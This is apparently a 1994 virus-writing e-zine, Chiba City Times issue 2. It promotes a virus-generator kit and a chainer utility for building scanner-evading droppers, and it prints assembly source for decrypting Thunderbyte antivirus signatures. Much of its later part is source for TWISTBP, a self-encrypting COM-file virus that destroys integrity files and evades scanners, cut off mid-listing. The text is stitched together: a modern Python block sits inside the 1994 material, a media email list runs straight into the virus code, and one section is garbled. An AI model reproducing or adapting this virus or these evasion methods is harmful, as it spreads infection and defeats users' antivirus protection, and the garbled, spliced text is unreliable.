Chiba City Times (C) Copyright 1994 Chiba City Blues, Inc.
Issue # 2, December 1994

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

C h i b a   C i t y   B l u e s
8 0 4 - 7 9 0 - 1 3 2 9

3 Nodes * 14.4 - 2400 * 1.45 gigs Online

Welcome

One of the world's biggest bulletin board systems dedicated to virus research and information security.

CCB#2 November 1994

YES! It is time once again for another issue of Chiba City Times. In the last few months, progress has been made in concentrating on virus production and discussion and less on flaming, meaningless posts. Stick around for 1995; it will be very interesting how things start out, I guarantee it.

The format of this edition is basically one file. I prefer to read just one text file, not 10-12 files. When looking for certain information found in technical journals like this one, it is nice to word-search one document. So anyway, I present to you issue #2 of Chiba City Times and welcome all feedback.. enjoy

FireCracker

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

% Word Search %
~~~~~~~~~~~~~~~

GREETSGO2FALCONSCREAMINGRADISHROCKSTEADYNOWHEREMANTIMELORDARISTOTLESPLOOZOAZRAEL
SAVAGEBEASTVIROGENEDCASEMIKEPARISANALOGDOGWOLFEEJLOOKOUTMANMETABOLISPADDYCHUNGGG
DIGITALJUSTICEEVILAVATARBIGDUDETHELOSTAVENGERSCARFACEDARKSERVANTRAIDENUNCLEHUNGR
ROADKILLESCAPEKEYMORATTHEBLACKMETALMANBLACKGATEQUIETWRITEROMEGAGREMLINCYBERPUNK3

[The remaining rows of the word-search grid were an ASCII-art block that did not survive extraction; only fragments of the hidden names are legible.]

% Headspin.exe %
~~~~~~~~~~~~~~~~

OK, FireCracker wanted a quick little 3-D thingy for Chiba City Times so... here it is - Chiba City Headspin. Graphics are in a low-res mode, so it should run on most any 386 or above with about 500k base memory. Slower systems, and laptops with poor video, will suffer.

Also... for all you virus programmers out there... I know it's big (over 2.7 megs) for such a short run, but hey! I'm an artist, not a programmer!

Greetings out to members of NuKE, Phalcom Skism, Lord Rook, Aristotle (yeh, John!) Grady, Gate Keeper, Rock Steady, Savage Beast, Screaming Radish, Yoho Yip, Falcon, and others...
Wolfee

% NuKE Random Life Generator %
Written By Azrael, [NuKE]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Generator is actually nothing that is really new to the virus exchange community. It is a virus generator that was released in June 1994 by a member of NuKE named Azrael. He is the sysop of The Satanic Brain BBS in South America. While it is difficult for us to communicate because of a language barrier, we seem to understand the topic. It is apparent a few people around the world have played with this generator, but I do not believe that the major vx population has had a chance to play with it. When I last talked to Azrael, it appeared a newer version of the NRLG will be out sometime near the first of the year without some of the encryption bugs that have popped up now and then when I was testing it. I think this effort to introduce another GUI interface with a virus-producing product is exactly what the virus community desires. Anyway, enough of the running of the mouth; unzip nrlg.zip into a directory and run nrlg.bat. Have fun and enjoy... also remember to send Azrael some criticism so that he can improve his utility.

% Fellow Sysops beware! %
~~~~~~~~~~~~~~~~~~~~~~~~~

Underground QWKs Restricted
Last Updated: Wednesday, August 10th, 1994 at 8:21pm
4 files - 615,030 bytes

Filename      Bytes    Date      File Description
ÄÄÄÄÄÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
CHIBA615.ZIP  192528   06-15-94  QWK Mail Packet from Underground BBS Called:
                                 "The Streets of Chiba City"
                                 NOTE: This Board is the Main Distribution Hub
                                 for the NukeNet, America's Lagest Virus
                                 Writing Network! Good Intelligence Source!
                                 Location of BBS: Richmond, VA Area
                                 QWK Mail Packet Retrieved 6-15-94
CHIBA76.ZIP   163899   07-06-94  QWK Mail Packet from Underground BBS Called
                                 "The Streets of Ciba City"
                                 QWK Mail Packet Retrieved 7-6-94
CRIS615.ZIP    62510   06-15-94  QWK Mail Packet from CRIS BBS
                                 Technicaly this BBS is not classified as a
                                 member of the underground networks. However,
                                 they do exchange viruses ONLINE and echo the
                                 EMAIL conferences of NukeNet, VirEx as well
                                 the legitimate FIDO Virus related echos and
                                 their own CRIS Net. Still a VERY good source
                                 of information and intelligence.
                                 Location of BBS: Chicago, Illinois
                                 QWK Mail Packet Retrieved 6-15-94
CRIS706.ZIP   196093   07-06-94  QWK Mail Packet from CRIS BBS
                                 QWK Mail Packer Retrieved 7-6-94

This is a screen capture from a BBS that was run by a security officer of the United States Customs Agent in Indianapolis IL. After I received this info from a user of Chiba City, I searched through all the logs, found who this individual was and decided to call and see what the deal was. I was told that the QWKs were available for other federal law enforcement agencies to download to keep track of BBSs off tag lines. In a diplomatic way I let it be known that I did not agree with what was going on and thought that words like "underground" and ". . good source of intelligence" were misleading and suggested that illegal activities might be going on in Chiba City. I think I made my point quite well; needless to say he has not called back under that account name since we last talked, and not that it would matter, we cannot stop them from calling, but a good virus from that side of the fence or maybe a post would be great.

% Fun with Mini-Chainer %
~~~~~~~~~~~~~~~~~~~~~~~~~

Usually when I start playing with a virus, I generally grab 4 or 5 utils off the BBS to use as bait files for the virus. I run them on a notebook to see how it works with a real file. So one day I am grabbing a bunch of utils off the board when I came across something called MC.zip. I found when I ran the program that it was a COM/EXE chainer util. After playing with the program for a little bit, I got a cool idea. Let's take a virus, stick it in with another util and see if Mr. Scanner picks it up. Tried McAfee; you should already know the answer to that. F-Prot 2.14 was next, notta.
So I said hell, TBAV set on high heuristics blows sirens on just about any file that calls int 21h, so that is sure to do something. Nope! I played with the utility a little more, trying different viruses, and could not get it to scan. What a useful util, I thought to myself, then laughed and determined that I should share it with everyone. Have fun with this util that I have supplied with this edition of The Times. Just run it and have one virus and one "util" to test it on and bam, you got an undetectable dropper file.. Brings old viruses back to life for a short period of time. File name to look for is MC.EXE

% ALL THINGS MUST COME TO AN END %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

10/31/94 will be the last day for the hell pit (11:59 pm). This has nothing to do with legal problems, or the low-IQ monkeys who leave messages like "die fed." From now until we shut down, all files are FREE. Call everyone you know who is a member, and spread the news. No new users will be accepted from now on, as there is no point in that anymore. I am sure that by now our entire collection of files is spread among the public that makes up most of the underground around here, so hopefully they will resurface and not go to waste. I'd like to thank everyone who ever contributed to the system, including the first callers that we had when we went up four years ago. (You know who you are). So long and thanx for all the fish, and live knowing only that we may return... but not in this incarnation.

The Staff

% TBAVSIG %
~~~~~~~~~~~

ûirogen's Thunderbyte Anti-Virus Signature File Reader
version 2.0 for TBSCAN.SIG v6.22
Coded by ûirogen
The Adjacent Reality BBS [615.586.9515]
Jeremy.Collake@hal9k.com
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Welcome to the latest VG-TBSIG version; that'z right, the assholes at ThunderByte decided to change their TBSCAN.SIG file format somewhat (specifically the encryption).
It wasn't that difficult to defeat - but it was somewhat more involved this time. I've distributed the complete source code and format (as much as I know) of the TBSCAN.SIG file. Feel phree to make any enhancements you wish as long as you redistribute the source code and give credit to the original author [thatz me], and any authors of new mods.

Usage
ÄÄÄÄÄÄÄÄÄÄÄÄ

Place VG-TBSIG.COM in the same directory as TBSCAN.SIG and run.. the output is via DOS, so you can redirect it to a file. eg:

  VG-TBSIG > TBSIGS.TXT

You'll get a listing of all signatures for virii and other programs defined in the data file. XCEPT, there are 7 virii defined differently than the rest - I believe they are polymorphic virii which TBSCAN does not trace thru the decryptor to scan the original code. The groups of two hex bytes (4 ascii bytes) surrounded by '_'s are wildcards, and are defined as shown below in the technical info.

Technical Info
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

WildCards/Variable Positions:

  UserDef Ex   Description                               Signature String
  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  ?n         = Skip n amount of bytes and continue.      = 388n
  ?@nn       = Skip nn amount of bytes and continue.     = 38nn (see note 1)
               nn should not exceed 7F.
  *n         = Skip up to n bytes.                       = 384n
  *@nn       = Skip up to nn bytes and continue.         = 38nn (see note 1)
               nn should not exceed 1F.
  nL         = One of the values in the range n0-n7.     = 382n
  nH         = One of the values in the range n8-nF.     = 383n

þnote1: The highest bit is set to 1 provided nn is in the range suggested above. If it exceeds that range, then the highest bit is not set to 1.
þnote2: I believe all 00 bytes in the signatures are interpreted as wildcards.

Example:

  Virus       : PC-Flu_II
  ÀÄSignature : 50_383B_2001_3882__383B__3884__383B__3848_2E30_384E_E2
  Xlation     : 50 Bh 2001 ?2 Bh ?4 Bh *8 2E30 *E 12

Format of TBSCAN.SIG:

There are two types of blocks in the data phile; I didn't need all the info from them so I didn't goto the trouble of filling in the missing blanks.
The data blocks start at offset 80h in the phile.

1) for virii which have multiple-scan strings defined, or some algorithmic approach (polymorphic):

  byte 0 = If 0FFh then no more entries
       1 = 0FFh
       2 = ?
       3 = ?
       4 = ?
       5 = ?
       6 = ?
       7 = ?
       8 = ?
       9 = ?
       A = length of virus name
       B = ?
       C = index to virus name (from start of block)
       D = ?
       E = index to next data block (from start of block)

  ptr to next block calculation: oldptr + byte Eh

2) for normal virii:

  byte 0 = if 0FFh then no more entries
       1 = if 0Fh then non-virus entry or special entry
       2 = ?
       3 = ?
       4 = if bit 6 = 1 then entry is user-defined
       5 = ?
       6 = ?
       7 = length of signature
       8 = length of virus name
       9 = ?
       A = start of virus name

  ptr to next block calculation: oldptr + 0Ah + byte 7h + byte 8h

Encryption of Virus Names:

The virus names are encrypted in the following technique, which is actually a form of compression; if you'll notice, every encrypted word decrypts to three bytes.

  þ string XORed by A5h
  þ NULL appended at end for stop point of next loop
  þ string then processed thru the following loop:

  assume si=start of string, di=new location, bx=table [alphabet_. ,]

  start:
          lodsb                   ; get byte
          test    al,al           ; not all chars compressed/crypted..
          js      continue
          stosb                   ; store byte
          jnz     start           ; 0 designates end of string
          ret
  continue:
          mov     ah,al           ; save byte
          lodsb                   ; get next byte
          mov     dx,ax           ; save retrieved word
          mov     al,ah           ; process first byte retrieved
          shr     al,1            ; shift-right .. [xtract nibble]
          shr     al,1
          call    xlation         ; xlat- stosb- ret:ax=dx
          shl     ax,1            ; shift-left
          shl     ax,1
          shl     ax,1
          mov     al,ah
          call    xlation         ; xlat- stosb- ret:ax=dx
          call    xlation
          jmp     start
  xlation:
          and     al,1Fh
          dec     ax
          xlat                    ; xlation table defined below - al=bx[al]
          stosb                   ; save byte
          mov     ax,dx           ; restore retrieved word
          ret

  table   db      'abcdefghijklmnopqrstuvwxyz_. ,'

Encryption of Virus Signatures is a simple byte XOR by A5h.
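As an added example (not part of the zine or of Virogen's VG-TBSIG), the two conventions just described rendered in Python: the name packing undone by the loop above, with an inverse so the round trip can be checked on constructed data, and a matcher for the Xlation wildcard notation (?n, ?@nn, *n, *@nn, nL, nH) so its detection semantics can be exercised against a constructed byte buffer. Function names and all sample data are assumptions; note 2 (00 bytes as wildcards) is not implemented.

```python
# Added example, not part of the zine or of Virogen's VG-TBSIG.  Two pieces
# of the TBSCAN.SIG v6.22 conventions described above, in Python:
#   unpack_name()/pack_name()  the XOR A5h + three-chars-per-word name packing
#   parse_signature()/scan()   matching of the "Xlation" wildcard notation
#                              (?n, ?@nn, *n, *@nn, nL, nH, literal hex)
# Function names and all sample data are constructed for this example.

TABLE = "abcdefghijklmnopqrstuvwxyz_. ,"  # 30 symbols; on-disk indexes are 1-based
XOR_KEY = 0xA5


def unpack_name(raw):
    """Decode a packed name.  After the XOR, a byte with the high bit clear is a
    literal character; one with the high bit set starts a 16-bit word laid out
    as 1 aaaaa bbbbb ccccc, three 5-bit indexes into TABLE.  A NUL ends it."""
    buf = bytes(b ^ XOR_KEY for b in raw)
    out, i = [], 0
    while i < len(buf) and buf[i] != 0:
        b = buf[i]
        if not b & 0x80:
            out.append(chr(b))
            i += 1
            continue
        if i + 1 >= len(buf):
            raise ValueError("truncated packed word at offset %d" % i)
        word = (b << 8) | buf[i + 1]
        i += 2
        # Same field order as the listing: (al>>2)&1F, then ((ax<<3)>>8)&1F,
        # then the low byte &1F; the "dec ax" makes the indexes 1-based.
        for idx in ((word >> 10) & 0x1F, (word >> 5) & 0x1F, word & 0x1F):
            if idx == 0:
                raise ValueError("zero index in packed word at offset %d" % (i - 2))
            out.append(TABLE[idx - 1])
    return "".join(out)


def pack_name(name):
    """Inverse of unpack_name: each run of three TABLE characters becomes one
    word with bit 15 set; any other character is stored as a literal byte."""
    out, i = bytearray(), 0
    while i < len(name):
        trio = name[i:i + 3]
        if len(trio) == 3 and all(c in TABLE for c in trio):
            a, b, c = (TABLE.index(ch) + 1 for ch in trio)
            word = 0x8000 | a << 10 | b << 5 | c
            out += bytes((word >> 8, word & 0xFF))
            i += 3
        else:
            if not 0 < ord(name[i]) < 0x80:
                raise ValueError("cannot store %r as a literal" % name[i])
            out.append(ord(name[i]))
            i += 1
    return bytes(b ^ XOR_KEY for b in out)


def parse_signature(text):
    """Turn the article's Xlation notation into a list of match ops."""
    ops = []
    for tok in text.split():
        if tok[0] == "?":                           # ?n / ?@nn : skip exactly
            ops.append(("skip", int(tok.lstrip("?@"), 16)))
        elif tok[0] == "*":                         # *n / *@nn : skip up to
            ops.append(("upto", int(tok.lstrip("*@"), 16)))
        elif len(tok) == 2 and tok[1] in "LlHh":    # nL: n0-n7, nH: n8-nF
            base = int(tok[0], 16) << 4
            lo = base if tok[1] in "Ll" else base + 8
            ops.append(("range", lo, lo + 7))
        else:                                       # literal hex, e.g. 2001
            ops.extend(("lit", b) for b in bytes.fromhex(tok))
    return ops


def _match(ops, data, pos, k=0):
    """True if ops[k:] match data at pos; *n gaps are tried shortest first."""
    if k == len(ops):
        return True
    op = ops[k]
    if op[0] == "lit":
        return pos < len(data) and data[pos] == op[1] and _match(ops, data, pos + 1, k + 1)
    if op[0] == "range":
        return pos < len(data) and op[1] <= data[pos] <= op[2] and _match(ops, data, pos + 1, k + 1)
    if op[0] == "skip":
        return pos + op[1] <= len(data) and _match(ops, data, pos + op[1], k + 1)
    return any(pos + n <= len(data) and _match(ops, data, pos + n, k + 1)
               for n in range(op[1] + 1))


def scan(signature, data):
    """Offset of the first match of signature in data, or -1 if none."""
    ops = parse_signature(signature)
    for start in range(len(data) + 1):
        if _match(ops, data, start):
            return start
    return -1


if __name__ == "__main__":
    # Constructed buffer shaped to fit the article's PC-Flu_II Xlation string.
    SAMPLE = bytes.fromhex("9090" "50BC2001AABBB901020304BA1122332E3012CC")
    print(scan("50 Bh 2001 ?2 Bh ?4 Bh *8 2E30 *E 12", SAMPLE))   # 2
    print(unpack_name(pack_name("pc-flu_ii")))                     # pc-flu_ii
```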
History
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

1.0  - Initial release                   - 07-04-94
1.01 - Minor bug fix                     - 07-04-94 (yes the same damn day)
       If two wildcards were located in a sequence, the second would not be
       designated by the '_'s.
2.0  - Updated to read new TBSCAN.SIG    - 07-19-94
       format in version 6.22

Have phun! Live to die.

ûirogen '94
The AR 615.586.9515
Jeremy.Collake@hal9k.com

***Note on internet address***
If you send me mail to that address, I may or may not receive it.. just call my board if you get no response.
*******************************

section 1 of uuencode 5.24 of file vg-tbsig.com by R.E.M.

ascii ..cx=len..di=ptr push bx ; save block ptr lea dx,sig_stg ; indicate signature mov ah,9 int 21h mov bp,cx ; use BP as counter xor dx,dx hloop: mov bh,byte ptr [di] ; get byte dec dh ; decremt wc mark ctr cmp dh,1 ; time for trailing '_'? jnz no_trailer call disp_mark ; display trailer no_trailer: cmp bh,38h ; wildcard? 
jnz no_wcard no_adj: mov dh,3 ; setup counter to put trailing '_' call disp_mark ; indicate wildcard no_wcard: call byte_disp ; display as ASCII inc di ; increment ptr dec bp ; dec counter jnz hloop ; loop.. lea dx,pair ; display cr/lf call disp pop bx ; restore block ptr ret byte_disp: ; display hex->ascii byte, bh=byte mov ch,2 ; two ascii chars, two hex nibbles bloop: mov cl,4 rol bx,cl ; rotateL 4 bits, setup next nibble mov dl,bl and dl,0Fh ; kill other nibble add dl,30h ; +30=3xh -> ascii numeric digit cmp dl,3Ah ; numeric or alphabetic? jl no_add ; add dl,7 ; add if alphabetic no_add: call disp_one ; display 'de char man dec ch ; decrement counter jnz bloop ret disp_mark: mov dl,'_' disp_one: mov ah,2 int 21h ret decrypt: lea di,first_dec push cx cx di ; save string len&ptrs l1: lodsb ; get xor al,0A5h ; XOR by A5h stosb ; store loop l1 xor al,al ; append 0 stosb pop si cx lea di,print_stg cmp sig,0 ; sigs don't go thru second loop jz is_name sig_cpy:rep movsb ; copy sig for display jmp is_sig is_name: call decrypt2 is_sig: mov ax,0A0Dh ; append cr/lf stosw mov al,'$' ; append '$' stosb xor ax,ax pop cx ; restore slen ret decrypt2: ; decompression/decryption loop #2 lodsb ; get byte test al,al ; not all chars compress/crypted js get_nb stosb ; store byte jnz decrypt2 ; continue loop if !0 _ret: ret get_nb: mov ah,al ; save byte lodsb ; get next mov dx,ax ; save word mov al,ah ; start on second byte retrieved shr al,1 ; shift right [xtract nibble] shr al,1 call decrypt3 ; xlat -stosb- ret:ax=dx shl ax,1 ; shift left shl ax,1 shl ax,1 mov al,ah call decrypt3 call decrypt3 jmp decrypt2 ; continue loop.. decrypt3: and al,1Fh dec ax push bx lea bx,table ; bx points to xlation table xlat ; al=bx[al] pop bx stosb ; store byte mov ax,dx ; restore retrieved word ret table db 'abcdefghijklmnopqrstuvwxyz_. 
,' fname db 'TBSCAN.SIG',0
error_msg db 0Dh,0Ah,'Error opening TBSCAN.SIG!','$'
intro_msg db 0Dh,0Ah," ûirogen's Thunderbyte Signature File Reader - Coded by ûirogen"
          db 0Dh,0Ah,' þ Version 2.0 for TBSCAN.SIG v6.22 þ'
          db 0Dh,0Ah,' The Adjacent Reality BBS [615].586.9515'
          db 0Dh,0Ah,'ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ'
pair      db 0Dh,0Ah,'$'
space     db ' ','$'
user_stg  db 'User Defined $'
v_stg     db 'Virus : ','$'
nv_stg    db 'Non-Virus : ','$'
pv_stg    db 'Polymorphic Virus : ','$'
sig_stg   db 'ÀÄSignature : ','$'
sig       db 0                  ; 0 if name, !0 if sig being processed
first_dec db 50 dup(0)
print_stg db 50 dup(0)          ; 50+first 80h in buffer available
buffer:
cseg ends
end start

% Media Netmail %
~~~~~~~~~~~~~~~~~

---------------------- Media on Internet list ----------------------

What follows is a list of newspapers and other mass media outlets which have some form of contact via internet. This is nowhere near as comprehensive as it should be, so if you know of a paper which should be added, or of corrections to be made, drop me a line giving details. If you plan on writing a letter or note to any of the following media, don't forget to include your name, address and daytime phone.

If you can't find a listing where you expect it, check at the very end, where new entries have been placed. These either have not been alphabetized yet, or their geographic location could not be ascertained by my under-rested thinking organ. If you can't find it there, submit a correction / addition.
ST CITY MEDIA OUTLET NAME INTERNET ADDRESS CONTACT AK Anchorage Daily News 74220.2560@compuserve.com AL Birmingham Blazer Tribune kpate@vprua.vprua.uab.edu Ken Pate AL Birmingham WYDE-AM tony.giles@the-matrix.com Tony Giles AL Mobile WALA-TV gripper@aol.com Bob Grip AR Little Rock KARK newsfour@aol.com AZ Phoenix Phoenix Gazette phxgazette@aol.com AZ Tuscon KUAT-TV, PBS comments@kuat.arizona.edu BC Vancouver Vancouver Columbian vanpaper@aol.com CA Contra Cost CC County Times cctletrs@netcom.com CA Los Angeles Fox TV Network foxnet@delphi.com CA Los Angeles Urb Magazine urbmag@netcom.com CA Palo Alto Palo Alto Weekly paweekly@netcom.com. CA Palo Alto KZSU-FM info@kzsu.stanford.edu releases@kzsu.stanford.edu CA Sacremento Sacremento Bee sacbee@netcom.com sacbedit@netcom.com CA San Diego SD Union-Tribune computerlink@sduniontrib.com CA San Diego APR "Marketbasket" market@mizar.usc.edu CA San Francis Associated Press weise@well.sf.ca.us On the Net Col. CA San Francis KDFC-AM/FM ------------------- General comments comments@kksf.tbo.com News releases news@kksf.tbo.com CA San Francis KKSF-FM SAME AS KDFC-AM/FM CA San Francis KPIX-TV, CBS 74001.3461@compuserve.com CA San Francis SF Examiner sfexaminer@aol.com CA San Francis SF Examiner Mag. sfxmag@mcimai.com CA San Francis Whole Earth Review wer@well.sf.ca.us CA San Francis U. Magazine umag@well.sf.ca.us CA San Jose Mercury News ------------------ -------------- Editorial Columnist JOJACOBS@aol.com JoanneJacobs Environment Writer STHURM@aol.com Scott Thurm Editorial PHILIPY809@aol.com Phil Yost CA San Jose OutNOW! jct@netcom.com CA San Jose The Spartan Daily MEAGHER@sjsuvm1.sjsu.edu Jason Meagher (408)924-3280 Ed. 
(408)924-7932 V-mail CA San Luis Ob KCBX kcbx@slonet.org CA San Mateo San Mateo Times smtimes@crl.com CA Santa Cruz Cruz Cnty Sentinel -------------------- --------------- Voice (408)423-4242 kevinw@cruzio.com Kevin Woodward Letters to editor sented@cruzio.com News desk sentcity@cruzio.com CA Santa Cruz KUSP-FM kusp@cruzio.com CA Santa Rosa The SRJC Oak Leaf roger@well.sf.ca.us Roger Karraker CA Santa Rosa Silueta silueta@wave.sci.org CA Travis AFB Tailwind paffairs@EMH1.TRAVIS.AF.MIL TSgt. DC Washington Aviation Daily grahamg@mgh.com DC Washington Journal Newspaper thejournal@aol.com DC Washington National Pub Radio ---------------------- Mon.Radio Letterbox letterbox@wshb.csms.com Talk of the Nation totn@aol.com Science Friday scifri@aol.com Fresh Air freshair@hslc.org West Coast Live west_coast_live@netcom.com Weekend ATC watc@cap.gwu.edu Weekend Ed./Sunday wesun@clark.net DC Washington PBS "POV" povonline@aol.com DC Washington Surveillant,Mil Int 70346.1166@compuserve.com DC Washington U.S.News&World Rpt vic@access.digex.net Vic Sussman Voice (202)955-2093 Fax (202)955-2549 DC Washington USA Today usatoday@clark.net DC Washington VOA/Worldnet TV ------------------- From outside the US letters@voa.gov From within the US letters-usa@voa.gov QSLs outside US qsl@voa.gov QSLs inside US qsl-usa@voa.gov Agriculture Today agri@voa.gov VOA-Europe(English) voa-europe@voa.gov VOA-Morning Program voa-morning@voa.gov FL Miami Sun-Sentinel vineeditor@aol.com FL Orlando GQ Magazine gqmag@aol.com FL St.Petersbu St.Petersburg Times 73174.3344@compuserve.com FL Tallahassee Tallahasse Democrat letters@freenet.fsu.edu IA Des Moines WHO-AM news@who-radio.com IA Iowa City Icon icon@igc.apc.org IL Chicago Playboy playboy@class.com IL Chicago The Tribune tribletter@aol.com ericzorn@aol.com Eric Zorn IL Chicago The Sun Times decc@cs.uchicago.edu Don Crabb Voice (312)702-7173 Fax(312)702-9417 IL Chicago WBBM-TV, CBS wbbmch2@aol.com IL Chicago WGN-TV wgntv@aol.com IL Evanston Daily 
Northwestern daily@merle.acns.nwu.edu IL Glen Ellyn WDCB Radio scotwitt@delphi.com IL Park Forest 2nd Amend. Caucus gunsmoke@bgu.edu Karl Rademacher IL Peoria Peoria Journal Star xxnews@heartland.bradley.edu IL Peoria WEEK-TV xxweek@heartland.bradley.edu IL Springfield Illinois Issues wojcicki@eagle.sangamon.edu. IL Univ. Park The Innovator gsurag@bgu.edu Jeff Dinelli Voice (708)534-4517 IL Urbana News-Gazette gazette@prairienet.org IN Greencastle DePauw Magazine mlillich@depauw.edu KS Lawrence C User's Journal cujsub@rdpub.com MA Cambridge Sky & Telescope skytel@cfa.harvard.edu MA Cambridge The Tech ------------------ ------------- News news@the-tech.mit.edu Spots sports@the-tech.mit.edu MA Boston Bay Windows baywindo@world.std.com MA Boston The Boston Globe multiple listings letters to editor letter@globe.com MA Framingham Middlesex News multiple listings general news@news.ci.net letters to editor letters@news.ci.net op ed page oped@news.ci.net The Answer guys guys@news.ci.net MI Albion Student Newspaper cleverett@albion.bitnet Chris Leverett MI Detroit WXYZ-TV, ABC Affil. wxyztv@aol.com MI Flint Flint Journal fj@flintj.com MI ? Student Movement smeditor@andrews.edu ME Maine PubTV "Media Watch" greenman@maine.maine.edu MN Minneapolis Minnesota Daily network@edit.mndly.umn.edu. MN Minneapolis Training Magazine trainmag@aol.com MN Minneapolis Twin Cities Reader sari23@aol.com MN Minneapolis WCCO-TV wccotv@mr.net MN St. Paul Pioneer Press vpress@aol.com MO Columbia KOMU-TV, NBC swoelfel@bigcat.missouri.edu. MO St. Charles St.Charles Countian pacmosteve@aol.com MO St. Louis KWMU-FM kwmu@umslva.bitnet MO Springfield News-Leader --------------------- -------------- Letters to editor nleditor@ozarks.sgcl.lib.mo.us Press releases nlnews@ozarks.sgcl.lib.mo.us ; --==TWISTBP.ASM==-- ; ; This program is for eductional purposes only. The author takes no ; responsibilty for any use or misuse of this program. 
(Generic Disclaimer) ; ; -Appending *.COM infector ; -Random encrpytion using dos get time funtion ; -Preserves original file date and time ; -Three infections per run ; -Nuke those pesky NTZ files off the face of the EARTH ; -A encryption routine big enought to get 10 signatures ; -Unscanable by Tbav - Ha Ha another Twist variant? ; -F-prot scans the original virus as a Trival variant ; -= Thanks to FireCracker, Memory Lapse, Viper, Talon ; -= Qark, and everyone else that responded to my stupid ; -= messages. ; -= A special thanks to all the NuKE Members ; ; Mr. Twister, NuKE ; ; Assemble tasm twistbp ; link with tlink /t twistbp .model tiny .radix 16 .code org 100h byt equ end_it - ntz_nuke virus_size equ end_it - start start: xchg si,si ; just filling space nop ; infection marker nop ; infection marker call loc_1 ; do the call to push called location loc_1: pop bp ; onto the stack then pop into bp sub bp,107 ; sub 107 to get back to -0- call decr ; on the first run the encrypt value ; is -0- so no change on subsquent ; runs the random value is stored into ; enc_val so file is decrypted jmp where ; this is the actual virus what: call enc ; encrypt the main part of the virus mov ah,40 ; Write file mov cx,virus_size ; Write the virus size lea dx,[bp+offset start] ; Load the offset of the ; virus into dx int 21 ; dos function inc [bp+counter] ; got one increase the counter jmp $+2 ; Thanks Screaming call decr ; decrypt the virus so we can continue ret ; return back to the main body nop ; marker nop ; marker nop ; marker enc_val db 0 ; this is the value that we will counter db 0 ; encrypt with, its zero to start nop ; then changes on subquent infections nop ; marker enc: mov ah,2c ; dos get time function int 21 ; dos does it mov [bp+enc_val],cl ; move the minute into the encryption ; value, this allows for 59 variations decr: mov cx,byt ; byt is the number of bytes to xor lea si,[bp+offset Ntz_nuke] ; point si at the start of the actual ; virus dec_lp: lea 
di,[bp+offset buff] ; point di at the buffer movsb ; move the byte at si into the buffer mov al,[bp+offset buff] ; move the buffer into al xor al,[bp+enc_val] ; xor the al with the enc_val mov [bp+offset buff],al ; move the byte back into the buffer lea di,[si-1] ; point di back to where the byte came from lea si,[bp+offset buff] ; point si at the buffer movsb ; mov si to di buffer back into the virus mov si,di ; movsb increments after each use loop dec_lp ; loop X number of times X=byt ret ; done with this function bail ntz_nuke: mov ah,4e ; Find the first match get_ntz: lea dx,[bp+offset Ntzmask] ; Load the offset filemask dx int 21 ; dos call jc do_again ; can't find continue infection lea dx,[bp+offset end_it+1e]; Load the offset fname (á) Mov Cl, 7Ah ; This loads 7a04 into ax Xchg Ah, Cl ; shr makes 7a04 into 3d02 Mov Al, 04h ; ' ' Shr Ax,1 ; Open The File Up int 21 ; dos does it mov bx,ax ; move file handle into bx mov ax,4202 ; go to the end of the file xor cx,cx ; zero these two register or xor dx,dx ; you'll get very wierd results int 21 ; thanks dos mov [bp+how_much],ax ; ax is the file size we want to get ; it all xor cx,cx ; zero these two register or xor dx,dx ; you'll get very wierd results mov ax,4200 ; move back to the front of the file int 21 ; thanks dos push cs ; cs and ds are the same pop ds lea dx,[bp+New_dta] ; write the information to the file ; from the new dta area mov cx,[bp+how_much] ; how much are we going to smear xor ax,ax mov ah,40 ; write file function int 21 ; dos call mov ah,3e ; close the file int 21h ; dos call mov ah,4f ; search for another one jmp get_ntz ; go back to the start do_again: ret ; only jumps here when sure no more ; exists where: lea bx,[bp+offset return_bytes] ; Load the address ; of bp plus the original offset ; of return bytes into di. 
push ds:[bx] ; push the first two bytes of the ; original program onto the stack add bx,02 ; increase di to point to the next ; two bytes we saved of the orig prog push ds:[bx] ; push the last two bytes we saved ; of the original program onto the ; stack mov ah,1a ; Set DTA lea dx,[bp+offset end_it] ; Load the effective address ; of the end of the virus to ; be used for the new DTA int 21 ; dos call call ntz_nuke ; see ya Ntz mov ah,4e ; Find the first match get_f: lea dx,[bp+offset filemask] ; Load the offset filemask dx int 21 ; dos call jc Jp_err ; can't find the file name outahere jmp getbad ; sloppy jump to get over near jp_err: jmp exit_error ; jump problem getbad: mov ah,2f ; get the new DTA int 21 ; this is returned in bx xor ax,ax ; clear up ax lea dx,[bp+offset end_it+1e] ; Load the offset fname (á) Mov Cl, 7Ah ; This loads 7a04 into ax Xchg Ah, Cl ; shr makes 7a04 into 3d02 Mov Al, 04h ; ' ' Shr Ax,1 ; Open The File Up int 21 ;mov ax,3d02 ; open file function - read/write ;int 21 ; dos call xchg bx,ax ; move the file handle into BX mov ax,5700 ; get the files original date int 21 ; and time and move this mov [bp+date],dx ; value to date/ time mov [bp+time],cx ; move cd into buffer lea di,[bp+offset end_it+1a] ; Load the offset fsize (á) mov ax,word ptr ds:[di] ; Move this fsize into ax sub ax,3 ; Take off three to build jmp mov word ptr [bp+jump_address+1],ax ; save these bytes ; at jump address+1 which is ; jmp (xx xx+3) or 0e9 xx xx mov ah,3f ; Read file 